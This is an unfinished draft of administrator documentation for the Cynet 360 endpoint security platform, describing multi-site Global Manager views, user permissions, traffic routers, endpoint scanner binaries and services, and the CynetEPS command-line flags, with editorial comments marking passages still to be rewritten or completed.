Navigation between the sites is the most basic of control that enables the User to move between the servers that are managed and connected to the Global Manager. The default view for global Operators and Users who have access to multiple sites is, is the “ALL” option. This provides the User with full visibility and control (based on User access privileges) over all of the environments.

*Selecting a site navigates to the single site dashboard giving the same look and feel as a single standalone server.

Global Views

As part of the visibility provided by the Global Manager the User is able to access the summarized data for alerts & forensic artifacts from the Global Manager all dashboards , each of the dashboards providing different aspects of visibility towards the environment. COMMENT: This paragraph requires rewriting – it is quite unclear.

Global Alert view

The Alerts tab in the Global Manager when selected under the “All” site displays all the alerts that triggered in the environments across all sites. The alert itself is presented at the same as a normal site alert would appear inside a standalone interface , with some additional information regarding the site displayed on the right.

The User can view the overview details for a quick reference, the alert site origin and general status in the global environment and expand the alert to view all the relevant forensic meta data without drilling into the single site interface directly. COMMENT: Requires rewrite.

Global Forensic View

Inside the “All” forensic view, the User can receive an overview of all the various forensic artifacts collected by Cynet, divided into several pillars. The information collected contains some of the metadata to provide a quick check across the environment. Clicking a forensic object directs the User to the full forensic data inside the site.

Global Forensic Files

The Global Forensic Files view displays all the executable files running across the environment. The User can enter a specific file name or SHA256 and receive an immediate response if it is a file that ran in the environment. Clicking on a file or SHA256 takes the User directly to the site forensic page where the file was executed.

Global Forensic Hosts

The Global Forensic Hosts view provides a quick summary of all hosts in the environment across sites, and an easy way to find a specific asset that exists from basic key information associated with that asset.

Clicking on the asset drills down to the host forensic page of the specific site where the host resides.

Global Forensic Users

The Global Forensic Users view provides a quick overview of all Users that exist in the environment across sites. The common use case is to identify a User as part of an investigation, or quickly understand when the last login of a specific User took place.

Clicking on a User take you to the Users forensic area inside the site where the User resides.

Global Forensic Domains

In the Global Forensic Domain view, the User can quickly identify remote domain access and identify how many Hosts or Users have access to specific domains.

Clicking on a domain takes the User to the Domain Forensic page inside the site where the domain was accessed.

Global Audit log

Auditing information is collected in the Global Manager server and all access is monitored across the sites. The activities performed are also logged, and this information can be exported to a SIEM platform or other third parties using Syslog.

Global User Configuration

Once Users are created, there are two levels of permission assigned to them.

  1. Site Access Rights

These specify to which sites the User has login access. A single site means that a User has a normal standalone experience using Cynet without any global dashboards. Having access to multiple sites enables a global dashboards view and site navigation.

  1. User Access Privilege

Each site access is mapped to a permission authorization level. A User may have custom permission or Operator rights to a single or multiple sites. The User privileges define the actions that a User can take and to which view capabilities they have access.

In multi-tenant environments there is an additional privilege level named Global Operator that is mapped to a full administration of the environment. This means that full access to all of the sites is managed by the global Operator. Additional rights exist relating to the Global Manager operations such as creating additional global Operators, creation of new sites, and maintenance activities to sites already managed by the Global Manager.

Once a User is created and mapped to permissions, modifying or adding permissions to a new site is performed via the User Permission matrix.

SIEM Integration

Configuring SIEM integration using a Global Manager enables an option to integrate with the Global Manager site providing visibility to activities on the Global Manager level to the SIEM. In addition, the User can configure the site integration with the SIEM centrally from the same interface.

Global Site Security Configuration

The Global Manager provides central administration to all the sites enabling a quick way to set the security policy for all the sites managed by the Global Manager. The User can establish a global policy to enforce a template of all of the sites, or modify the configuration on a per-site basis via the Central Scan Group menu.

Selecting a feature from the list of Cynet capabilities present various options of the feature as checkboxes that the User can enforce globally or per scan group on each site.

Each site connected to the Global Manager provides a list of all the scan groups and their settings updated to the current configuration on the site. This enables the User to view the settings applied and configure them from a single dashboard.

Global Manager

This section describes the features of the Global Manager.

Global Operator

The permission level of a global Operator enables the User to manage site creation and perform other maintenance operations on the Global Manager level. On top of the administrative rights to the Global Manager server, a global Operator has full administrative access to all the sites managed by the Global Manager server.

Client Site Manager

Site Status

The Global Sites status displays the current connectivity status of all the sites in the environment and reflects the connectivity of the Global Manager to the sites and acts as a basic health indicator for the site itself.

The client ID specified next to each site reflects the ID that this customer instance has with Cynet relating to the license activation process and contact ID for the CyOps SOC team.
Cloud Sync represents the health of the connection between the Cynet Site Server and the Cynet VPC Back Office cloud.

This is a crucial connection that is the pipeline for some of Cynet’s security capabilities as well as threat intelligence and Cynet SoC team remote assistance in monitoring alerts and assisting in investigation and incident response.

Create Site

Site creation in a Global MSSP environment has two main options depending on the infrastructure and architecture of the environment.

In a simple global environment, each new site is a standalone server (Physical / virtual), which must be installed and configured as a standalone Cynet server before they are connected to the Global Manager

In an Advanced Global environment with the central management worker services and additional servers hosting the Hosts Server & Docker Server, Sites are created as virtual services, and Docker instances enable automated site creation to take place using the auto deployment tool. COMMENT: Paragraph really unclear – Please review.

Users can create new sites automatically using the auto deployment tool by specifying the contact details relating to the site owner / point of contact and specifying a Client ID, which is provided by Cynet or acquired as part of an ongoing MSSP license agreement.

Auto-Deployed Sites Action

This displays the status of actions performed using the auto-site deployment tool. The following information is important for Client deployment purposes:

Token: This is the unique identifier agents use to connect to their server sites.

Action: Logs the action relevant to the site (such as creation, deletion).

Status: Presents the outcome of the performed action. Starts as pending and goes towards either success or failure.

*All actions have a default fail time and retry mechanism. For more details refer to the Global Manager Installation Guide.

Client Sites

Once a site is created, it appears under the client sites with information relating to the server IP and port binding to both the API and DB, which is required for the Global Manager to connect and manage the site.

Site deletion is performed using the Remove button.

Site renaming is performed using the Edit button.

 

Distributed Architecture

COMMENT: TBD.

Traffic Router

The Traffic Router is a Cynet proxy component that acts as a gateway between the protected Cynet Assets to the Cynet Server.

Traffic routers are used in several use cases:

  • Single site roaming devices support (DMZ)
  • Single site isolated network
  • Multi-site environments (MSSP)

Traffic routers have two modes of operation based on the required use case:

Static Mode

In Static Mode the traffic router forwards all agent traffic to the next hop configured – the Cynet server.

This scenario is used to support roaming devices or sub-networks that are not directly connected to the Cynet Server.

By placing the traffic router in the DMZ and providing a publicly accessible address for the roaming assets, the User can connect the roaming assets to the traffic router and have the traffic router forward the traffic to the Cynet server transparently to the protected asset. COMMENT: Rewrite

Using the DMZ approach limits the Cynet server exposure to external threats and improves overall security architecture for roaming devices protection.

Dynamic

In multi-tenant environments, using a traffic router is mandatory as the traffic router is responsible for directing the connected agents to their Cynet site server

When configured as a dynamic traffic router, a connection to the Global Manager enables the traffic router to receive a list of all of the active tokens and site mappings. This enables the traffic router to be aware of the sites available. Once an agent connects to the traffic router in this mode, the token is validated to match an existing site and then the traffic is forwarded to the Cynet server site.

Master/Slave architecture

COMMENT: TBD

The Master server will need access to the Slave server(s) database to retrieve all data related to the Slave server’s scanned endpoints. This connection occurs on TCP port 3333. The Slave server will communicate with the Master server using an API in the web console via TCP port 8443.

Note

The default web console listening port is TCP 8443. However, this can be changed in the configuration settings. The connection from a Slave server to a Master server must be on the configured Web console port for the Master server.

System Components

Understanding Cynet Binaries

The following are binaries used by Cynet 360 to scan endpoints. See the “Cynet Server Services” section for more information about the executables and services that run on the Cynet server for analysis, detection, and remediation of threats.

Executables (Windows)

The following executable is run from the C:\Windows\ directory:

CynetEPS.exe

The Endpoint Scanner (EPS) process is deployed by the Cynet 360 server to Windows endpoints to be scanned. It deploys certain child processes (see below) and collects indicators from files, Users, hosts, and network data for threat analysis. This process handles all communication between the endpoint and the Cynet server.

The following are child processes dynamically spawned by CynetEPS.exe:

CynetMS.exe – The Memory Scanner (MS) process scans memory usage by running processes for malicious activity.

CynetAR.exe – The Auto Run (AR) process collects data regarding autorun entries, drivers, task, and services for processes scheduled to run at boot (persistence).

CynetGW.exe – The GUI Window (GW) process collects data regarding Windows activity for each process, to detect processes running in hidden windows.

CynetSD64.exe – The Software Dev 64-Bit (SD64) process collects DLL dependencies for 64-bit processes running on the system. Since the CynetEPS is running as a 32-bit process, the CynetSD64 process is necessary to collect this data from 64-bit processes.

CynetLauncher.exe – The Launcher executable is a remote execution process that runs on endpoints to distribute the CynetEPS executable for scanning.

CynetDS.exe – The Deep Scan executable runs on endpoints for forensic analysis of a specified process. The CynetDS can only monitor one process per host at a time, but multiple hosts can have the deep scan running at the same time. See “Deep Scan Settings” for more information.

CynetRunner.exe – The Runner executable is deployed to endpoints when certain remediation actions are used. When “Run Command” or “Run File” actions are used, this process handles the execution of the action, and collects the response output. The output can then be viewed in the console interface.

CynetRunner64.exe – The 64-bit version of the CynetRunner.exe process (see above).

Daemons (Linux & Mac)

The following daemon is run from the /opt/Cynet/ directory:

CynetEPS

The Endpoint Scanner (EPS) daemon is deployed by the Cynet 360 server to Linux or Mac endpoints to be scanned. It collects indicators from files, Users, hosts, and network data for threat analysis. This process handles all communication between the endpoint and the Cynet server.

Cynet Services

The following are services used by Cynet 360 for various purposes. Services are listed as services that run on the server, and services that run on the scanned endpoints in the environment.

Cynet Server Services

The services listed below are only found on the Cynet server for processing scan data from scanned endpoints.

CSHelper (cshelper.exe) – The CSHelper service acts as a watchdog service for the other Cynet services on the server. It constantly checks that all other Cynet services are running and automatically restarts any that are not currently running. This service can also check if updates to the Cynet server version exist. If the system is configured for automatic updates, it begins the update process and restarts the Cynet services after the update has completed.

Cynet (cynet.exe) – The Cynet service is the central Cynet service, which coordinates actions between all other Cynet services. It performs start-up checks, performs database updates or maintenance if necessary, performs threat analysis queries, heartbeat back to the Cynet VPC, performs threat intelligence queries, sends file to the sandbox for analysis, and performs remediation actions on endpoints (if actions are taken manually or through auto-remediation).

CynetListener (cynetlistener.exe) – The CynetListener service is responsible for listening for raw scan data coming in from endpoints. This service places this data in a temporary queue where it is processed by the CynetProtobufHandler service, when available.

CynetProtobufHandler (cynet.protobufprocessor.exe) – The CynetProtobufHandler service is responsible for processing raw scan data collected from endpoints by the server and processing the data so it can be stored in the appropriate database location.

Redis (redis-server.exe) – The Redis service is a queue application responsible for the communication between the Cynet database and the frontend Web interface. The queuing provides quick page loads when using the Web interface, especially with actions that require complex queries to the database.

[OPTIONAL] CynetSyslog (Cynet.Syslog.exe) – The CynetSyslog service can be configured to run a syslog listener. This service accepts incoming syslog messages through a configured port and archives them on the Cynet server. The Cynet server can also be configured to parse syslogs (see “Configuring Log Parser Settings”).

Endpoint Services (Windows)

The service listed below is installed on any Windows host with the Light Agent installed.

CynetLauncher

This service is created when the light agent is installed on a Windows host. This service runs the CynetLauncher.exe once at boot up, which invokes the CynetEPS process on the endpoint with the necessary command-line parameters.

Note

The CynetLauncher service does not stay in the ‘Running’ state after it is run. To verify the light agent is running, check the task manager and look for the CynetEPS process to be running.

Endpoint Services (Linux)

The services listed below are installed on any Linux host with the Light Agent installed.

Cyservice

This service is created when the light agent is installed on a Linux host. This service starts the CynetEPS daemon when the system boots. It is placed in the /etc/init.d/ directory.

Endpoint Services (Mac)

The services listed below are installed on any Linux host with the Light Agent installed.

com.cyneteps.service.plist

This service is created when the light agent is installed on a Mac host. This service starts the CynetEPS daemon when the system boots. It is placed in the /Library/LaunchDaemons/ directory.

CynetEPS Command-Line Flags

The CynetEPS process that runs on Windows endpoints contains several command-line flags that activate or deactivate certain functionality of the Cynet scanner while it scans endpoints. The flags can be seen in the “Command Line” column in the Windows Task Manager.

A typical CynetEPS execution with a full command-line of flags can look like this:

CynetEPS.exe 192.168.200.100 –port 443 –cpulimit 15 –scanid 52 –alwayson –driver -donetworkcheck –adthransom –adtdokill –ualert –fh -fhdokill

Note

The first command-line argument specifies the IP address of the Cynet server. It is a required argument for the CynetEPS to run. There is no flag to define this argument.

The table in the following section contains a list of the command-line flags and values that are available to control the functionality of the CynetEPS. These flags are set at the time of execution and are typically set by the Cynet server when scanning endpoints. They may also be used to set the default configuration of the Light Agent during agent installation. Consult Cynet support for any questions regarding these flags.

FlagDescription
-port <port>This flag, along with a port number, defines the port the EPS uses when sending scan data back to the Cynet server.

Example: -port 443

-secip <ip>This flag along with an IP address defines a secondary IP address for the EPS to send scan data to. This IP address is only used if the primary IP address (specified in the first command-line argument) is unavailable.

Example: -secip 192.168.100.200

-secport <port>This flag along with a port number defines the port for the secondary IP address the EPS uses when sending scan data back to the Cynet server.

Example: -secport 8443

-cpulimit <value>This flag along with a numeric value defines the maximum amount of CPU usage that the CynetEPS and CynetMS can consume when scanning the host. 60% of this value is allocated to the CynetEPS process, while the remaining 40% is allocated for the CynetMS process.

Example: -cpulimit 15

(9% to CynetEPS, 6% to the CynetMS)

-memsize <value>This flag along with a numeric value defines the maximum amount of memory usage the CynetEPS and CynetMS can consume when scanning the host (in Megabytes). This limit is applied to the CynetEPS and CynetMS process respectively.

Example: -memsize 300

-heartbeat <value>This flag along with a numeric value defines the interval in which the CynetEPS heartbeats back to the Cynet server (in seconds). The default value is 300 (5 minutes).

Example: -heartbeat 15

-donetworkcheckThis flag enables the CynetEPS to perform an Internet connectivity check. This connectivity is factored into the risk score analysis.

Example: -donetworkcheck

-nomemstrThis flag disables memory string collection by the CynetEPS when analyzing processes on endpoints during scanning.

Example: -nomemstr

-ps <ip>This flag along with the host’s IP address enables the EPS to bind to the NIC configured with this IP address to detect network-based attacks.

Example: -ps 192.168.1.10

-pps <value>This flag along with a numeric value defines the maximum number of network packets the CynetEPS analyzes per second. If this limit is exceeded, the Network Monitor within the CynetEPS enters sleep mode until it has completed analyzing all packets in the current queue.

Example: -pps 10000

-ualertThis flag enables the CynetEPS to display a pop-up on the endpoint desktop when an alert is generated by Cynet to notify the User.

Example: -ualert

-driverThis flag enables the CynetEPS to install a driver on the system for the self-protection mode. This mode ensures that the EPS process cannot be killed on the host. It also provides kernel level visibility.

Example: -driver

-driverblockrawThis flag enables blocking any attempt to write to the MBR.

Example: -driverblockraw

-driverkillrawThis flag enables automatic remediation for any attempt to write to the MBR. Any process that was blocked from writing to the MBR is killed.

Example: -driverkillraw

-driverloghandleThis flag enables logging for process handles on scanned endpoints. This flag is typically only used for troubleshooting.

Example: -driverloghandle

-debugconfigThis flag stores all scan data in an unencrypted data file on the endpoint, so it is human-readable. This flag is typically only used for troubleshooting.

Example: debugconfig

-disableupdateThis flag disables the CynetEPS from automatically updating its arguments from the Cynet server. This flag is typically only used for troubleshooting.

Example: -disableupdate

-showconsoleThis flag enables the CynetEPS to display all activity to a command prompt at execution. This flag is typically only used for troubleshooting.

Example: -showconsole

-savelog

(-loglevel <value>)

This flag enables the CynetEPS to log all activity to a log file located at C:\Windows\clog\CynetEPSLog.txt. Optionally, the –loglevel flag can be used in conjunction to specify what types of events must be saved in the log. This flag is typically only used for troubleshooting.

Log Levels:

all

trace

debug

info (default)

warn

error

fatal

off

Example: -savelog

Example: -savelog –loglevel all

Example: -savelog –loglevel 1

-debugmsThis flag enables the CynetMS to log all activity to a log file located at C:\Windows\System32\CynetLoggerMS.txt or C:\Windows\CynetLoggerMS.txt (depending on the working directory). This flag is typically only used for troubleshooting.

Example: -debugms

-savejsonThis flag enables the CynetEPS to create JSON files locally, which simulates data files sent back to the Cynet server (called PCQ files). These JSON files are typically saved to C:\Windows\system32\CynetEPSJson#.file. This flag is typically only used for troubleshooting.

Example: -savejson

-savezipThis flag enables the CynetEPS to save all PCQ files to a single ZIP file. This ZIP file is typically saved to C:\windows\CynetEPSJson.zip. This flag is typically only used for troubleshooting.

Example: -savezip

-osharecycle <value>This flag, along with a numeric value, defines the minimum amount of time the CynetEPS takes to collect information from a remotely opened file (in minutes).

Example: -osharecycle 3

-fhThis flag enables the Fuzzy Hashing detection mechanism. With the Fuzzy Hashing technique, Cynet can mathematically calculate similarities in code to detect similar variants of malware.

Example: -fh

-fhdokillThis flag enables remediation based on threats detected using the Fuzzy Hashing technique. Processes are automatically killed when detected.

Example: -fhdokill

-decoyThis flag enables the CynetEPS to monitor for brute force attempts on decoy files and Users that were deployed to the endpoint.

Example: -decoy

-adtdisableThis flag disables the ADT (Advanced Detection Technology) heuristic engine on the CynetEPS. This functionality is enabled by default on the CynetEPS unless this flag is set. Cynet does NOT RECOMMEND disabling this feature, as it is an important mechanism for threat detection.

Example: -adtdisable

-adthdokillThis flag enables the CynetEPS to automatically kill processes determined to be malicious by the ADT Heuristic Engine.

Example: -adthdokill

-adthransomThis flag enables the CynetEPS ransomware detection mechanism in the ADT Heuristic Engine.

Example: -adthransom

-adtnodecoyThis flag disables the decoy file feature for ransomware detection in the ADT Heuristic detection. With this feature, hidden decoy files are deployed to specific locations on the file system for ransomware detection. Cynet does NOT RECOMMEND disabling this feature, as it affects the ability to detect new variants of ransomware.

Example: -adtnodecoy

-adtdecoylimit <value>This flag, along with a numeric value, defines the maximum disk space that can be used by the ransomware heuristic decoy files (in Megabytes).

Example: -adtdecoylimit 100

-adtnoproccbThis flag disables…COMMENT: Missing text?

Example: adtnoproccb

-fastscanThis flag enables the CynetEPS external threat intelligence

Example: -fastscan

-fastscandokillThis flag enables the CynetEPS to automatically remediate threats detected using external threat intelligence.

Example: -fastscandokill

Terms and Abbreviations

The following terms and abbreviations are used throughout this document:

Term / AbbreviationDefinition
AVAntivirus
CISOChief Information Security Officer
CMDBConfiguration Management Database
CSVComma Separated Value
DNSDomain Name System
EDREndpoint Detection and Response
EPSEndpoint Scanner
IoCIndicators of Compromise
IPInternet Protocol
KBKnowledge Base
MFAMulti-Factor Authentication
NGAVNext Generation Antivirus
ObjectA file, User, host, network, or socket
ODBCOpen Database Connectivity
OSOperating System
OUOrganizational Unit
RDPRemote Desktop
RPCRemote Procedure Calls
SOCSecurity Operations Center
SIEMSecurity Information and Event Management
SSEServer Sent Events
SSHSecure Shell
UBAUser Behavior Analytics
UEBAUser and Entity Behavior Analytics
UIUser Interface
URLUniform Resource Locator (Web address)
VPCVirtual Private Cloud